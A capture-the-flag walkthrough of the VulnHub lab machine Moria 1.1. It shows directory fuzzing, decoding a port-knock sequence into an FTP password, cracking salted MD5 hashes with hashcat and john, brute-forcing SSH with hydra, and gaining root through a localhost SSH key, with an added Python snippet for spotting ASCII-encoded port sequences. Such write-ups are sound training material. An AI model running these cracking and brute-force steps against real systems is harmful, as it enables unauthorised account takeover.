Recon
TCP/21 (FTP)
- Anonymous login disabled
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/scans]
└─# ftp $ip
Connected to 192.168.110.36.
220 Welcome Balrog!
Name (192.168.110.36:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
- Balrog could be the username
TCP/80 (HTTP)
FFUF - common.txt
┌──(root💀kali)-[~/vulnHub/moria-1.1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fc 403
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.36/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php .cgi .log
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 85, Words: 5, Lines: 8]
index.php [Status: 200, Size: 85, Words: 5, Lines: 8]
index.php [Status: 200, Size: 85, Words: 5, Lines: 8]
w [Status: 301, Size: 232, Words: 14, Lines: 8]
:: Progress: [27690/27690] :: Job [1/1] :: 4932 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
- Found directory: w
Initial Foothold
TCP/80 (HTTP) - Nothing Found
- Further enumerate w/
┌──(root💀kali)-[~/vulnHub/moria-1.1]
└─# ffuf -u http://$ip/w/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fc 403 -recursion -of html -o ffuf.html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.36/w/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php .cgi .log
 :: Output file      : ffuf.html
 :: File format      : html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 403
________________________________________________

http://192.168.110.36/w/h/i/s/p/e/r/FUZZ
- Proceed to http://192.168.110.36/w/h/i/s/p/e/r/
- The contents of the_abyss/index.php change every time we visit it
- Directory enumerate the_abyss/
┌──(root💀kali)-[~/vulnHub/moria-1.1]
└─# ffuf -u http://192.168.110.36/w/h/i/s/p/e/r/the_abyss/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.php,.txt,' -fc 403

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.36/w/h/i/s/p/e/r/the_abyss/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 403
________________________________________________

index.php               [Status: 200, Size: 21, Words: 4, Lines: 2]
random.txt              [Status: 200, Size: 407, Words: 54, Lines: 14]
:: Progress: [23075/23075] :: Job [1/1] :: 2929 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
- Found file: random.txt
- The content of the_abyss is randomized from random.txt
- Port Knocking?
Wireshark - Suspicious Network Traffic
- Unsure of what to do, started wireshark to observe the network traffic between Kali and the Moria 1.1 machine.
- SYN Packet coming from Moria 1.1 to Kali
- Port sequence: 77, 101, 108, 108, 111, 110, 54, 57
Port Knocking - Failed
- Port knock
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/scans]
└─# knock -v $ip 77 101 108 108 111 110 54 57
hitting tcp 192.168.110.36:77
hitting tcp 192.168.110.36:101
hitting tcp 192.168.110.36:108
hitting tcp 192.168.110.36:108
hitting tcp 192.168.110.36:111
hitting tcp 192.168.110.36:110
hitting tcp 192.168.110.36:54
hitting tcp 192.168.110.36:57
- Check for newly opened ports
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/scans]
└─# nmap $ip -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-02 18:14 +08
Nmap scan report for 192.168.110.36
Host is up (0.00023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BA:33:82 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds
- No new ports
- Instead, convert the port numbers to ASCII
- Mellon69
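The conversion above is the analyst's side of what the box did: a server sending unsolicited SYNs whose destination ports all fall in the printable-ASCII range is carrying data in the port field, not trying to connect. The following Python is an added example, not part of the original writeup, that automates that check over a constructed packet list: it groups SYN destination ports by source host, in arrival order, and reports any host whose whole sequence decodes to printable text. The packet tuples, the second "noise" host and the flag notation are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample capture in arrival order: (src_ip, dst_port, tcp_flags).
# The first host replays the eight SYNs the writeup observed from Moria 1.1;
# the second host is constructed noise so the filter has something to reject.
SAMPLE_PACKETS = [
    ("192.168.110.36", 77, "S"),
    ("192.168.110.36", 101, "S"),
    ("192.168.110.36", 108, "S"),
    ("192.168.110.36", 108, "S"),
    ("192.168.110.36", 111, "S"),
    ("192.168.110.36", 110, "S"),
    ("192.168.110.36", 54, "S"),
    ("192.168.110.36", 57, "S"),
    ("192.168.110.36", 80, "A"),   # a plain ACK, not part of any knock sequence
    ("192.168.110.50", 22, "S"),   # ordinary SSH connection attempt (port 22 < 32)
    ("192.168.110.50", 443, "S"),  # ordinary HTTPS connection attempt (port 443 > 126)
]


def syn_ports_by_source(packets):
    """Group destination ports of SYN-only packets by source host, keeping arrival order."""
    sequences = defaultdict(list)
    for src, dport, flags in packets:
        if flags == "S":
            sequences[src].append(dport)
    return dict(sequences)


def decode_ports_as_ascii(ports):
    """Return the ASCII string if every port is a printable byte (32..126), else None."""
    if not ports or any(not 32 <= p <= 126 for p in ports):
        return None
    return bytes(ports).decode("ascii")


def find_encoded_sequences(packets):
    """Map each source host whose SYN ports all decode to printable ASCII to that text."""
    found = {}
    for src, ports in syn_ports_by_source(packets).items():
        text = decode_ports_as_ascii(ports)
        if text is not None:
            found[src] = text
    return found


if __name__ == "__main__":
    for src, text in find_encoded_sequences(SAMPLE_PACKETS).items():
        print(f"{src}: {text!r}")
```

The printable-range filter is what separates a signal from normal traffic: real connection attempts go to ports like 22 or 443, which fall outside 32..126, so a host only shows up when its entire SYN sequence reads as text.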
TCP/21 (FTP) - Found web content
- Access FTP w/ Balrog:Mellon69
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/loot]
└─# ftp $ip
Connected to 192.168.110.36.
220 Welcome Balrog!
Name (192.168.110.36:root): Balrog
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /prison
ftp> dir
229 Entering Extended Passive Mode (|||24812|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44933|).
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Mar 11  2017 bin -> usr/bin
dr-xr-xr-x    4 0        0            4096 Mar 11  2017 boot
drwxr-xr-x   19 0        0            2960 Feb 28 16:30 dev
drwxr-xr-x   97 0        0            8192 Feb 28 16:30 etc
drwxr-x---    4 0        1003           32 Mar 14  2017 home
lrwxrwxrwx    1 0        0               7 Mar 11  2017 lib -> usr/lib
lrwxrwxrwx    1 0        0               9 Mar 11  2017 lib64 -> usr/lib64
drwxr-xr-x    2 0        0               6 Nov 05  2016 media
drwxr-xr-x    2 0        0               6 Nov 05  2016 mnt
drwxr-xr-x    2 0        0               6 Nov 05  2016 opt
drwxr-x---    2 0        1001           27 Mar 14  2017 prison
dr-xr-xr-x  115 0        0               0 Feb 28 08:30 proc
dr-xr-x---    8 0        0             276 Mar 13  2017 root
drwxr-xr-x   26 0        0             760 Mar 01 05:01 run
lrwxrwxrwx    1 0        0               8 Mar 11  2017 sbin -> usr/sbin
drwxr-xr-x    2 0        0               6 Nov 05  2016 srv
dr-xr-xr-x   13 0        0               0 Feb 28 16:30 sys
drwxrwxrwt    8 0        0             170 Mar 01 06:18 tmp
drwxr-xr-x   13 0        0             155 Mar 11  2017 usr
drwxr-xr-x   21 0        0            4096 Feb 28 16:30 var
226 Directory send OK.
ftp> pwd
- The entire filesystem is shared on FTP
- Proceed to /var/www/html to look for additional web content
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||14844|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.
ftp>
- Found directory: QlVraKW4fbIkXau9zkAPNGzviT3UKntl
TCP/80 (HTTP) - Obtain hashes
- Proceed to QlVraKW4fbIkXau9zkAPNGzviT3UKntl
Prisoner's name   Passkey
Balin             c2d8960157fc8540f6d5d66594e165e0
Oin               727a279d913fba677c490102b135e51e
Ori               8c3c3152a5c64ffb683d78efc3520114
Maeglin           6ba94d6322f53f30aca4f34960203703
Fundin            c789ec9fae1cd07adfc02930a39486a1
Nain              fec21f5c7dcf8e5e54537cfda92df5fe
Dain              6a113db1fd25c5501ec3a5936d817c29
Thrain            7db5040c351237e8332bfbba757a1019
Telchar           dd272382909a4f51163c77da6356cc6f
- Hash format: MD5(MD5(Password).Salt)
Crack Hash - Hashcat
- Extract usernames & hashes
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# cat creds.txt | awk '{print $2}' | sed 's/name//g' | awk 'NF' | tee hashes.txt
c2d8960157fc8540f6d5d66594e165e0
727a279d913fba677c490102b135e51e
8c3c3152a5c64ffb683d78efc3520114
6ba94d6322f53f30aca4f34960203703
c789ec9fae1cd07adfc02930a39486a1
fec21f5c7dcf8e5e54537cfda92df5fe
6a113db1fd25c5501ec3a5936d817c29
7db5040c351237e8332bfbba757a1019
dd272382909a4f51163c77da6356cc6f

┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# cat creds.txt | awk '{print $1}' | sed 's/Prisoner.*\|Passkey//g' | awk 'NF' | tee usernames.txt
Balin
Oin
Ori
Maeglin
Fundin
Nain
Dain
Thrain
Telchar
- Append salt to hash w/ : delimiter
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# paste -d ":" hashes.txt salt | tee salted_hash_hashcat
c2d8960157fc8540f6d5d66594e165e0:6MAp84
727a279d913fba677c490102b135e51e:bQkChe
8c3c3152a5c64ffb683d78efc3520114:HnqeN4
6ba94d6322f53f30aca4f34960203703:e5ad5s
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP
6a113db1fd25c5501ec3a5936d817c29:cC5nTr
7db5040c351237e8332bfbba757a1019:h8spZR
dd272382909a4f51163c77da6356cc6f:tb9AWe
- Research which hashcat mode cracks this hash: vBulletin, mode 2611
- Crack hash
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# hashcat -a 0 -m 2611 salted_hash /usr/share/wordlists/rockyou.txt --show | cut -d ":" -f3 | tee passwords.txt
flower
rainbow
spanky
fuckoff
hunter2
warrior
abcdef
darkness
magic
Crack Hash - John
- View formats: dynamic_6: md5(md5($p).$s)
- Append salt to hash w/ $ delimiter
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# paste -d '$' hashes.txt salt | tee salted_hash_john
c2d8960157fc8540f6d5d66594e165e0$6MAp84
727a279d913fba677c490102b135e51e$bQkChe
8c3c3152a5c64ffb683d78efc3520114$HnqeN4
6ba94d6322f53f30aca4f34960203703$e5ad5s
c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
6a113db1fd25c5501ec3a5936d817c29$cC5nTr
7db5040c351237e8332bfbba757a1019$h8spZR
dd272382909a4f51163c77da6356cc6f$tb9AWe
- Crack hash
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# john --format=dynamic_6 salted_hash_john
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
flower           (?)
warrior          (?)
spanky           (?)
rainbow          (?)
abcdef           (?)
fuckoff          (?)
darkness         (?)
magic            (?)
hunter2          (?)
9g 0:00:00:00 DONE 2/3 (2022-03-03 18:36) 450.0g/s 1512Kp/s 2856Kc/s 2856KC/s PHOENIX..kids2
Use the "--show --format=dynamic_6" options to display all of the cracked passwords reliably
Session completed.
TCP/22 (SSH)
- Create wordlist in username:password format for hydra
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# paste -d ":" usernames.txt passwords.txt | tee hydra_creds.txt
Balin:flower
Oin:rainbow
Ori:spanky
Maeglin:fuckoff
Fundin:hunter2
Nain:warrior
Dain:abcdef
Thrain:darkness
Telchar:magic
- Bruteforce SSH
┌──(root💀kali)-[~/vulnHub/moria-1.1/192.168.110.36/exploit]
└─# hydra -C hydra_creds.txt ssh://$ip
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-02 20:26:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries, ~1 try per task
[DATA] attacking ssh://192.168.110.36:22/
[22][ssh] host: 192.168.110.36   login: Ori   password: spanky
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-02 20:26:07
- Ori:spanky
- SSH w/ Ori:spanky
Privilege Escalation
Root - Via Creds Found (SSH Key)
- Linpeas
- Ori SSH'ed into localhost
- The known_hosts file is a client-side file that records every remote host previously connected to
- SSH into localhost w/ private key
- Root Flag
[root@Moria ~]# cat flag.txt
"All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king."

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?

-Abatchy
[root@Moria ~]#
- View Root's authorized_keys
[root@Moria .ssh]# cat authorized_keys
from="127.0.0.1" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison
[root@Moria .ssh]#
- Contains Ori's public key, restricted with from="127.0.0.1" so it is only accepted for logins originating from localhost